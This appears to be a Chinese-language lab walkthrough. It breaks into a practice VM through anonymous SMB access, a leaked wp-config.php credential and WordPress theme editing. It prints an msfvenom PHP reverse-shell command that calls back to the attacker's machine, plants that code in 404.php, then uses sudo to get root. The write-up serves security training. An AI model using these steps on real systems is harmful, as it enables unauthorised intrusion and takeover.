SMB服务信息泄露

1、首先局域网扫描靶机的iP

SMB服务信息泄露_第1张图片

2、使用nmap扫描靶机的IP看看开放的端口详细信息

SMB服务信息泄露_第2张图片

3、扫描信息及版本以及目录扫描

SMB服务信息泄露_第3张图片

SMB服务信息泄露_第4张图片

4、查看扫描目录和文件

我们进行访问80端口

SMB服务信息泄露_第5张图片

发现并没有什么作用,因此我们根据扫描的敏感信息进行查看

在robots.txt中发现有4个目录

SMB服务信息泄露_第6张图片

我们可以找到数据库后台登录页面和登录页面

SMB服务信息泄露_第7张图片

SMB服务信息泄露_第8张图片

我进行了用户枚举但没有找到

但是我们可以尝试一下admin这个用户,接下来就是用户密码

我们使用爆破密码也不行因此而提示我们,没有开启WordPress

SMB服务信息泄露_第9张图片

5、了解smb协议

 139 ,445(TCP) - 文件和打印共享 一般来说我们都是通过139或445端口来进行文件共享,而这种文件共享的协议统称为smb协议。

然后我们使用kail对smb协议进行弱点分析并进行利用。

使用命令:smbclient

直接使用空密码enter进入就可以

SMB服务信息泄露_第10张图片

接着我们分别进入三个变量中,并观察有什么文件信息

SMB服务信息泄露_第11张图片

SMB服务信息泄露_第12张图片

查看三个变量后,我们发现share$变量中发现有目录wordpress和deets.txt

下载deets.txt

进入wordpress目录中,发现有一个wp-config.php

发现wp-config.php文件这个有用

 注:wp-config.php文件是wordpress建站的配置文件,里面有wordpress的数据库信息,语言信息。

下载wp-config.php

6、查看下载的文件

密码:12345,先记下

SMB服务信息泄露_第13张图片

发现了数据库后台登录的用户和密码

Admin:TogieMYSQL12345^^

7、进行登录尝试

Admin:TogieMYSQL12345^^,可以登进页面

SMB服务信息泄露_第14张图片

我们发现有一个可以编辑的404.php

SMB服务信息泄露_第15张图片

接下来我们就可以使用msfconsole生成一个php的监听脚本

msfvenom -p php/meterpreter/reverse_tcp lhost=kaliip lport=kali监听端口 -f raw 

 

查看监听的脚本后,把/*去掉把后面的代码修改在404.php上进行保存

然后访问
 

http://192.168.31.210/wordpress/wp-content/themes/twentyseventeen/404.php

SMB服务信息泄露_第16张图片

SMB服务信息泄露_第17张图片

8、进入shell终端并进行优化

建立交互式环境

python -c 'import pty;pty.spawn("/bin/bash")'

9、提权

首先查看是否含有suid提权

SMB服务信息泄露_第18张图片

发现没有可以提权的存在

我也去尝试sudo来进行提权,还是没有可以提权的点,因此我们再查看/etc/passwd,看看有没有特殊用户SMB服务信息泄露_第19张图片

使用之前记录的密码

然后再使用suid提权

发现现在是rbash权限,并且无法提权

我们再尝试sudo提权看看

SMB服务信息泄露_第20张图片

发现togie拥有sudo所有权限

所以sudo su - root

SMB服务信息泄露_第21张图片

你可能感兴趣的:(php,系统安全,安全,web安全)